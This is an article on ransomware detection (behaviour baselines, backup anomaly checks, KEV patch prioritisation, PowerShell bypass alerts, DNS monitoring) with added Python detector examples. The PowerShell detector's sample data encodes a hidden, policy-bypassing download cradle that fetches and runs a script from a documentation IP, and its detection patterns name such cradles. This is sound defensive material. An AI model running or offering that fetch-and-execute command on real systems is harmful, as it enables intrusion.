Ransomware is everywhere. The NCC Group Annual Threat Monitor report states that ransomware attacks rose 93 percent in 2021. While there were 1,389 such attacks in 2020, they soared to 2,690 in 2021. The U.S. was the prime target, accounting for more than half of the attacks, followed by Europe at 30 percent. The industrial and public sectors were the most popular verticals (both at 19.35 percent) followed by consumer cyclicals (16.13 percent). NCC Group added that ransomware accounts for 65.38 percent of all incidents its global cyber incident response team dealt with for the year.
With ransomware being so prevalent, what should organizations be doing to detect it, mitigate its impact, and prevent any future attacks?
Here are some of the top techniques for ransomware detection and prevention.
Monitoring systems for unusual activity
One of the standard ways of detecting ransomware is by monitoring data usage patterns for unusual activity.
Signals of unusual activity
Out-of-the-ordinary activity—like file name or extension changes, data transfers, or permissions updates—can signal a ransomware attack in progress. For this technique to work, however, security professionals need to have a baseline for normal activity levels, ideally across a large cross-section of files, locations, and functions.
Once that baseline is available, spotting attacks in progress is easier and more accurate. But establishing the baseline is hard.
How to establish a baseline
First, you need to understand which files are business-critical and which are not. Of the millions of files under management at most enterprises, only 12 to 15 percent are business-critical, said Karthik Krishnan, CEO, Concentric Security.
Baselining all files takes more resources, and it can lead to frustrating false positives. In addition, it is vital to understand what a normal activity level looks like, and that can vary quite a bit from user to user. Collecting that information takes time.
“While baseline-based attack detection is a robust way to spot ransomware attacks, the need for large amounts of data and analytics has kept the technique out of reach,” said Krishnan. “However, emerging AI-based tools can autonomously create and evaluate a baseline for activity. With that, ransomware detection based on activity monitoring is now within reach.”
Concentric’s Semantic Intelligence, for example, can autonomously establish baseline parameters for data security management without needing rules or policies developed by the IT team. Its Risk Distance analysis baselines security practices and surfaces at-risk data.
Attackers consistently abuse legitimate tools—a tactic known as living off the land—to locate critical systems, weaknesses, and vulnerabilities before launching a ransomware attack. These behaviors often take place over a period of days or weeks.
During this time, an attacker can go undetected by endpoint detection tools because the attacker is not using anything that is known to be malicious. In other words, endpoint detection and response (EDR) tools may have a hard time detecting attacker behavior until it is too late.
The best approach for early detection
Detecting known-bad file signatures and known malicious tooling is still important. But it won't catch living off the land tactics that harness legitimate and trusted tools, because nothing in those tools is malicious on its own.
Similarly, AI or machine learning (ML) solutions that key only on known threats tend to produce a high false-positive rate and can become unmanageable. The behavior-based approach that a modern security information and event management (SIEM) platform provides can instead detect living off the land techniques that signature-based detection cannot: for example, an account that has never touched administrative tooling suddenly enumerating shares, creating scheduled tasks, or running credential-dumping commands across many hosts in a short window.
“It’s extremely important that organizations focus on detecting the first three steps of a ransomware attack: discovery, gaining a foothold, and escalating privileges,” said Matthew Warner, CTO and co-founder at Blumira, a provider of automated threat detection and response technology. “Detection, in addition to being aware as to what data you hold that could help you restore from a backup, will allow you to quickly respond to attacks, or at worst case, understand how to handle post-exploitation of a ransomware event.”
Anomaly detection for backups
The ransomware ecosystem is now vast, with many different forms of attack. Many attackers run their own versions of ransomware, known as variants. Each variant has the same goal, but it may differ in its encryption mechanism, delivery method, or simply its file-naming convention.
The majority of ransomware variants, and all of the top 10 forms for 2021, followed the same attack pattern: infiltrate a system, encrypt its files, and rename them with a new extension.
Why is anomaly detection important for backups?
Organizations need to detect ransomware as early as possible to stop the threat and commence remediation. And since ransomware tends to hit the backups first, organizations should opt for a backup solution that includes anomaly detection that can identify changes in an environment that require the attention of IT, said JG Heithcock, general manager of Retrospect.
The right solution should allow admins to:
- Set the filter for the data in the environment that must be observed
- Set a threshold for irregular behavior (for example, if the percentage of files new or changed out of the total number of files matched by the filter is greater than or equal to the threshold, it will create an anomaly event)
- Customize the notification process
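The baseline and threshold checks described above (the activity baseline in the first section and the backup filter-and-threshold rule in this one) come down to the same comparison, shown here as an added example that is not Concentric's or Retrospect's code. Two snapshots of file metadata are compared; files that are new or changed under a path filter are counted against a threshold, and extension renames, the pattern ransomware leaves behind, are listed separately. The record fields, the fnmatch-style filter syntax, and the sample snapshots are assumptions made for this example.

```python
"""Added example (not Concentric's or Retrospect's code): a file-change anomaly
check. Compares a baseline snapshot of file metadata with a current one, computes
the share of new or changed files under a filter, and pairs up extension renames.
The record fields, the glob filter syntax and the sample data are assumptions."""
from dataclasses import dataclass
from fnmatch import fnmatch
from pathlib import PurePosixPath
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class FileRecord:
    path: str      # POSIX-style relative path inside the backup set
    size: int
    digest: str    # content hash; placeholder values in the samples below


@dataclass
class AnomalyEvent:
    filter_glob: str
    threshold: float
    total: int                               # files matched by the filter now
    new: List[str]
    changed: List[str]
    extension_changes: List[Tuple[str, str]]  # (old path, new path) pairs
    ratio: float                             # (new + changed) / total


def extension_rename_pairs(vanished: List[str], appeared: List[str]) -> List[Tuple[str, str]]:
    """Pair a file missing from the current snapshot with a new file in the same
    directory that kept its full name and gained a suffix (report.docx ->
    report.docx.locked) or kept only its stem (report.docx -> report.encrypted).
    The stem rule can also match a legitimate format conversion, so treat it as a
    signal to review, not proof on its own."""
    pairs = []
    for old in vanished:
        o = PurePosixPath(old)
        for new in appeared:
            n = PurePosixPath(new)
            if n.parent == o.parent and (n.name.startswith(o.name + ".") or n.stem == o.stem):
                pairs.append((old, new))
                break
    return pairs


def check_snapshot(baseline, current, filter_glob="*", threshold=0.10) -> Optional[AnomalyEvent]:
    """Return an AnomalyEvent when the share of new or changed files under the
    filter reaches the threshold, or when any extension rename is seen (a design
    choice for this example: a single rename is cheap to review and rarely benign)."""
    base = {r.path: r for r in baseline if fnmatch(r.path, filter_glob)}
    cur = {r.path: r for r in current if fnmatch(r.path, filter_glob)}
    appeared = sorted(set(cur) - set(base))
    vanished = sorted(set(base) - set(cur))
    changed = sorted(p for p in cur if p in base and cur[p].digest != base[p].digest)
    renames = extension_rename_pairs(vanished, appeared)
    total = len(cur)
    ratio = (len(appeared) + len(changed)) / total if total else 0.0
    if ratio >= threshold or renames:
        return AnomalyEvent(filter_glob, threshold, total, appeared, changed, renames, ratio)
    return None


# Constructed snapshots. Digests are placeholders, not real hashes.
BASELINE = [
    FileRecord("finance/q1/report.docx", 120_000, "d1"),
    FileRecord("finance/q1/budget.xlsx", 80_000, "d2"),
    FileRecord("finance/q2/forecast.xlsx", 95_000, "d3"),
    FileRecord("hr/handbook.pdf", 2_000_000, "d4"),
    FileRecord("eng/README.md", 4_000, "d5"),
]
# An ordinary day: one engineer edited a document.
NORMAL_SNAPSHOT = [r for r in BASELINE if r.path != "eng/README.md"] + [
    FileRecord("eng/README.md", 4_200, "d5-edited"),
]
# Encryption under way in the finance share: files renamed with a new extension
# and a ransom note dropped alongside them; everything else untouched.
ATTACK_SNAPSHOT = [
    FileRecord("finance/q1/report.docx.locked", 120_512, "e1"),
    FileRecord("finance/q1/budget.xlsx.locked", 80_512, "e2"),
    FileRecord("finance/q1/README_RECOVER.txt", 900, "note"),
    FileRecord("finance/q2/forecast.xlsx", 95_000, "d3"),
    FileRecord("hr/handbook.pdf", 2_000_000, "d4"),
    FileRecord("eng/README.md", 4_200, "d5-edited"),
]

if __name__ == "__main__":
    for name, snap in (("normal day", NORMAL_SNAPSHOT), ("attack", ATTACK_SNAPSHOT)):
        event = check_snapshot(BASELINE, snap, filter_glob="finance/*", threshold=0.10)
        print(name, "->", "no anomaly" if event is None else event)
```

Run against the finance filter, the normal-day snapshot produces nothing while the attack snapshot reports three of four files new or changed (ratio 0.75) plus two extension renames. Against the whole set with a 25 percent threshold, the single edited README stays under the line, which is the false-positive trade-off the threshold exists to manage.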
“When it comes to ransomware, a multi-pronged approach that includes protection, detection (i.e., anomaly detection) and the ability to recover (i.e., object locking and immutable backups) is the best defense,” said Heithcock. “It’s critical to know when you are being attacked, but it’s even more important that you are able to recover, maintain operations, and avoid paying even a cent in ransom.”
Tracking the exact path of entry and attack
When many people think about ransomware detection, they think about detecting the absolute last mile of the operation—the part after full enterprise compromise has occurred, and malicious payloads are delivered to encrypt and destroy data.
Unfortunately, detecting ransomware at this stage may still be fatal, as an adversary likely has complete control of the environment and can come and go at will. Some even say ransomware is something of a misnomer as it relates to the modern variants. RansomOps may be a better framing of the real threat.
What is RansomOps?
“RansomOps is all about detecting the exact tactics, techniques, and procedures used by a human operator that has infiltrated the network,” said Tim Wade, deputy CTO at Vectra, an AI cybersecurity company. “It involves detecting indications of initial compromise, discovery, and ultimately lateral movement activities – ideally as early as possible before redundant and persistent access can be achieved.”
However, this isn’t an easy task for most enterprise security programs without reorienting their focus, particularly when adversaries are using infrastructure and payloads that haven’t been discovered or turned into indicators of compromise yet.
Tools for ransomware tracing
That said, CISA maintains the Known Exploited Vulnerabilities (KEV) catalog, a list of common vulnerabilities and exposures (CVEs) with confirmed in-the-wild exploitation, which is a good resource both for deciding what to patch first and for deciding what to monitor for abuse. While threat intelligence won't prevent a patient zero scenario, it can retrospectively uncover symptoms of compromise.
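One practical way to use the catalog is to cross-reference it against a software inventory, as in this added example, which is not CISA's or Vectra's code. CISA publishes the catalog as JSON (known_exploited_vulnerabilities.json); the two records below are constructed samples that follow the catalog's field names, with real CVE IDs but illustrative values, and the inventory is constructed as well. Matching is by vendor and product only, because the catalog carries no version data.

```python
"""Added example, not CISA's or Vectra's code: cross-reference a software inventory
against records in the CISA KEV catalog's JSON shape and rank the hits. The two
catalog records and the inventory are constructed samples; the CVE IDs are real
catalog entries but the other field values are illustrative."""
import json
from collections import defaultdict
from datetime import date
from typing import Dict, List, Optional

SAMPLE_KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "sample",
    "count": 2,
    "vulnerabilities": [
        {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
         "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
         "dateAdded": "2021-12-10", "dueDate": "2021-12-24",
         "requiredAction": "Apply updates per vendor instructions.",
         "knownRansomwareCampaignUse": "Known", "notes": ""},
        {"cveID": "CVE-2021-34527", "vendorProject": "Microsoft", "product": "Windows Print Spooler",
         "vulnerabilityName": "Microsoft Windows Print Spooler Remote Code Execution Vulnerability",
         "dateAdded": "2021-11-03", "dueDate": "2021-11-17",
         "requiredAction": "Apply updates per vendor instructions.",
         "knownRansomwareCampaignUse": "Known", "notes": ""},
    ],
})

# Constructed inventory. KEV carries no version data, so a hit means "confirm the
# patch level on this host", not "this host is vulnerable".
SAMPLE_INVENTORY = [
    {"host": "app01", "vendor": "apache", "product": "log4j2", "version": "2.14.1"},
    {"host": "print01", "vendor": "Microsoft", "product": "Windows  Print Spooler", "version": "10.0.19041"},
    {"host": "web02", "vendor": "F5", "product": "NGINX", "version": "1.24.0"},
]


def normalize(s: str) -> str:
    """Case-fold and collapse whitespace so inventory spellings line up with KEV's."""
    return " ".join(s.lower().split())


def load_kev(text: str) -> List[Dict]:
    return json.loads(text)["vulnerabilities"]


def match_inventory(kev: List[Dict], inventory: List[Dict], today: Optional[str] = None) -> List[Dict]:
    """Return one hit per (asset, KEV record) pair sharing vendor and product,
    ranked: ransomware-linked first, then overdue, then earliest due date.
    `today` is an ISO date string; defaults to the current date."""
    now = date.fromisoformat(today) if today else date.today()
    index = defaultdict(list)
    for v in kev:
        index[(normalize(v["vendorProject"]), normalize(v["product"]))].append(v)
    hits = []
    for asset in inventory:
        for v in index.get((normalize(asset["vendor"]), normalize(asset["product"])), []):
            hits.append({
                "host": asset["host"],
                "cve": v["cveID"],
                "product": f'{v["vendorProject"]} {v["product"]}',
                "ransomware_use": v.get("knownRansomwareCampaignUse") == "Known",
                "overdue": date.fromisoformat(v["dueDate"]) < now,
                "due": v["dueDate"],
            })
    hits.sort(key=lambda h: (not h["ransomware_use"], not h["overdue"], h["due"]))
    return hits


if __name__ == "__main__":
    for hit in match_inventory(load_kev(SAMPLE_KEV_JSON), SAMPLE_INVENTORY, "2024-01-15"):
        flag = "RANSOMWARE" if hit["ransomware_use"] else ""
        print(f'{hit["host"]:8} {hit["cve"]:16} due {hit["due"]} {flag}')
```

The knownRansomwareCampaignUse field is the one to sort on for this article's purposes: it marks entries CISA has linked to ransomware campaigns, which are the ones whose exploitation should also be hunted for retrospectively in web, VPN and application logs.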
Vectra, too, offers an AI-driven detection and response approach that allows organizations to see and stop ransomware before damage occurs. It spots the earliest signs of ransomware including recon, privilege escalation, and lateral movement. It includes tools to help organizations with digital forensics and root out any lingering malware.
Dynamic threat hunting tools that leverage AI are vital to ransomware detection. But there is still the need for that human touch and the insight that can only come from an individual.
Lee Tibbals, senior cybersecurity analyst at Avertium, is a veteran of many threat hunts including the infamous SolarWinds and Log4j attacks. He takes advantage of tools such as SIEM and EDR but says there is no escaping the need for the analyst to have a deep knowledge of the IT environment.
The value of human analysts in threat hunting
IT security analysts provide valuable context, such as which logs exist to parse and what other vital information is available across the different systems. It is the combination of analyst skill with IT and security tools and data that unravels the attack vector, identifies the malware strain, and ultimately stops an attack.
“Having a good knowledge of the environment is the foundation to a successful threat hunt, along with the understanding of the threat indicators that make up a malicious campaign one might find when going through the logs,” said Tibbals.
PowerShell is a common vector used in ransomware attacks, so detecting malicious PowerShell activity is important to stop an attack in progress. Threat actors gravitate towards PowerShell because it’s a common IT tool and appears innocuous. Under the surface, though, it’s an extremely powerful utility that can perform a variety of tasks, including executing commands, obfuscating code, and downloading payloads.
How to handle PowerShell threat detection
A smart detection tactic is to watch for PowerShell execution policy bypasses. The execution policy is a setting that determines which PowerShell scripts (if any) can run on a system, but Microsoft itself documents that it is not a security boundary: any user can override it for a single launch with the -ExecutionPolicy Bypass switch, or hand PowerShell a base64-encoded script with -EncodedCommand, without administrative rights. A process launch carrying those switches, particularly one spawned by an Office application or a browser, is therefore a signal worth alerting on.
“There are several different ways to alert on PowerShell commands and scripts, including third-party software,” said Warner. “It is also fairly straightforward to enable it in Microsoft Group Policy but detecting the technique using that method would require combing through raw logs in Windows Event Viewer.”
Blumira’s threat detection and response platform, for example, can detect a PowerShell execution bypass in near real-time, alerting users early enough to stop a ransomware attack. The company also provides playbooks on how to remediate the alert with the ability to contact its support team for further assistance.
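What such a detection looks like over process-creation records (Windows event 4688 or Sysmon event 1 style), as an added example that is not Blumira's code: each launch is scored on the execution policy bypass and the other switches and cradles attackers pair with it, and any -EncodedCommand payload is decoded (base64 of UTF-16LE, which is what PowerShell expects) and scored again. The record field names, the weights, the alert threshold and the sample events are constructed for this example.

```python
"""Added example, not Blumira's code: flag PowerShell launches that bypass the
execution policy, hide their window, or carry an encoded command, from
process-creation records. Field names, weights, threshold and the sample events
are constructed for this example."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Weighted signals. The bypass alone reaches the alert threshold; -NoProfile and
# -NonInteractive are common in legitimate automation and only add weight.
SIGNALS = [
    (3, "execution policy bypass", re.compile(r"(?i)-(?:ep|ex[a-z]*)\s+(?:bypass|unrestricted)")),
    (2, "hidden window",           re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    (2, "download cradle",         re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")),
    (2, "invoke-expression",       re.compile(r"(?i)invoke-expression|\biex\b")),
    (1, "no profile",              re.compile(r"(?i)-nop(?:rofile)?\b")),
    (1, "non-interactive",         re.compile(r"(?i)-noni(?:nteractive)?\b")),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"(?i)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_THRESHOLD = 3


def encode_for_powershell(script: str) -> str:
    """What -EncodedCommand expects: base64 of the UTF-16LE script bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    m = ENCODED.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: Dict) -> Dict:
    """Score one process-creation record; the decoded payload is scored too."""
    cmd = event["command_line"]
    score, reasons = 0, []
    for weight, name, pattern in SIGNALS:
        if pattern.search(cmd):
            score += weight
            reasons.append(name)
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
        for weight, name, pattern in SIGNALS:
            if pattern.search(decoded):
                score += weight
                reasons.append(f"{name} (decoded)")
    parent = event.get("parent_image", "").rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:
        score += 3
        reasons.append(f"spawned by Office ({parent})")
    return {"score": score, "alert": score >= ALERT_THRESHOLD, "reasons": reasons, "decoded": decoded}


def scan(events: List[Dict]) -> List[Tuple[Dict, Dict]]:
    """Return (event, analysis) pairs for the records that reach the threshold."""
    results = []
    for e in events:
        a = analyze(e)
        if a["alert"]:
            results.append((e, a))
    return results


# Constructed sample events: a scheduled backup, a share-hosted script launched
# with the bypass switch, and an Office-spawned hidden, encoded download cradle
# (198.51.100.7 is an RFC 5737 documentation address).
SAMPLE_EVENTS = [
    {"host": "ws-017", "user": "CORP\\svc_backup",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"host": "ws-042", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File \\fs01\share\update.ps1"},
    {"host": "ws-042", "user": "CORP\\jdoe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -ep bypass -enc "
                     + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
]

if __name__ == "__main__":
    for event, result in scan(SAMPLE_EVENTS):
        print(event["host"], result["score"], ", ".join(result["reasons"]))
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Decoding the payload matters more than the switches: the encoded form is exactly how operators hide the download cradle from a string match on the command line, and the decoded text is what you will want in the alert. Scripts launched by backup jobs and management agents will legitimately use -NoProfile, which is why it carries little weight here.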
Remote access security
Keeping systems secure is a top priority for any IT team, and it’s only gotten more complicated since remote and hybrid work became the norm.
According to Coveware, 63 percent of ransomware attacks perform command and control (C2) actions using remote access software. To guard against the threat posed by insecure remote workforces, companies such as RealVNC offer remote access software that prioritizes security.
DNS monitoring
Almost all ransomware operations rely on a command and control (C2) server, and the malware has to resolve that server's name before it can reach it. Sending DNS requests through a resolver that can classify and block domains is therefore an easy and effective way to get insight into what is going on in the network and to surface those C2 lookups.
“In the DNS world, it’s not enough to rely on open-source intelligence (OSINT) data anymore,” said Peter Lowe, principal security researcher at DNSFilter. OSINT here means intelligence drawn from publicly available sources, in this context public threat-intelligence feeds and block lists of known malicious domains.
Accordingly, providers such as DNSFilter offer solutions that include AI-driven content categorization, application blocking, and DNS reporting.
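The kind of triage a resolver log makes possible, as an added example that is not DNSFilter's code: each query is checked against a block list (the OSINT layer), the registered domain's label is scored for the high-entropy look of algorithmically generated C2 names, and clients producing bursts of NXDOMAIN answers, the trace left by malware cycling through candidate domains, are flagged. The log format, block list, thresholds and sample lines are constructed for this example; the registered-domain split is deliberately naive (last two labels) and a production version would use the Public Suffix List.

```python
"""Added example, not DNSFilter's code: triage resolver query logs for C2 lookups.
Block-list match, Shannon-entropy check on the registered domain's label, and a
per-client NXDOMAIN count. Log format, block list, thresholds and the sample
lines are constructed; .example and .test are reserved names."""
import math
import re
from collections import Counter
from typing import Iterable, List, Tuple

BLOCKLIST = {"evil-c2.example", "malware-dl.example"}   # constructed OSINT-style list

# "<timestamp> <client> <qname> <qtype> <rcode>", one query per line (constructed format)
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)\s+(?P<rcode>\S+)$")


def registered_domain(qname: str) -> str:
    """Naive: last two labels. Real code should consult the Public Suffix List
    so that host.example.co.uk resolves to example.co.uk, not co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def in_blocklist(qname: str) -> bool:
    """True if the name or any parent domain is listed."""
    labels = qname.rstrip(".").lower().split(".")
    return any(".".join(labels[i:]) in BLOCKLIST for i in range(len(labels)))


def shannon_entropy(s: str) -> float:
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dga_like(qname: str, min_len: int = 12, min_entropy: float = 3.5) -> bool:
    """Long, high-entropy registered label. Thresholds are a starting point:
    real brand names with many distinct letters sit just under 3.5 bits."""
    label = registered_domain(qname).split(".")[0]
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


def triage(lines: Iterable[str], nxdomain_limit: int = 5) -> List[Tuple[str, str, str]]:
    """Return (client, qname, reason) findings for a batch of log lines."""
    findings = []
    nxdomain = Counter()
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        client, qname, rcode = m["client"], m["qname"], m["rcode"]
        if in_blocklist(qname):
            findings.append((client, qname, "blocklisted domain"))
        elif dga_like(qname):
            findings.append((client, qname, "DGA-like name"))
        if rcode == "NXDOMAIN":
            nxdomain[client] += 1
    for client, n in nxdomain.items():
        if n >= nxdomain_limit:
            findings.append((client, "*", f"{n} NXDOMAIN responses"))
    return findings


# Constructed sample: one client reaching a listed domain, one cycling through
# generated names until one resolves, one harmless typo.
SAMPLE_LOG = """
2024-03-01T09:00:01Z 10.0.0.15 www.microsoft.com A NOERROR
2024-03-01T09:00:02Z 10.0.0.15 login.microsoftonline.com A NOERROR
2024-03-01T09:00:05Z 10.0.0.15 update.evil-c2.example A NOERROR
2024-03-01T09:01:00Z 10.0.0.22 q7x2kd9vz3mwpl8a.test A NXDOMAIN
2024-03-01T09:01:01Z 10.0.0.22 b4ntr6yj1hcs5fge.test A NXDOMAIN
2024-03-01T09:01:02Z 10.0.0.22 zp9ka3xm7dq2wl5v.test A NXDOMAIN
2024-03-01T09:01:03Z 10.0.0.22 h8gb1ye6sn4tcr0j.test A NXDOMAIN
2024-03-01T09:01:04Z 10.0.0.22 r5wk2nf8yt3hbv9c.test A NXDOMAIN
2024-03-01T09:01:05Z 10.0.0.22 m2vq5zx8pk3da7wl.test A NOERROR
2024-03-01T09:02:00Z 10.0.0.31 typo.exmaple.test A NXDOMAIN
"""

if __name__ == "__main__":
    for client, qname, reason in triage(SAMPLE_LOG.splitlines()):
        print(f"{client:12} {qname:28} {reason}")
```

The entropy test is the piece to tune: login.microsoftonline.com comes out around 3.3 bits and passes, while the generated labels score 4.0, but a 3.5-bit threshold will still catch some CDN hostnames, so treat the DGA finding as an enrichment for the analyst rather than a block decision, and let the NXDOMAIN burst and the block-list hit drive automated response.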
Ransomware detection techniques reduce the impact of attacks
As ransomware attacks have become a bigger threat to enterprises, detection tools are more valuable than ever. The right cybersecurity solutions will help your IT team monitor your organization’s systems, generate alerts in the event of unusual behavior, and take steps to mitigate the attack.
However, the best way to minimize damage to your business assets and costly disruptions to your operations is to take steps to prevent ransomware attacks altogether. A strong prevention strategy will help you avoid becoming the next ransomware victim.
Read next: How to Prevent Ransomware Attacks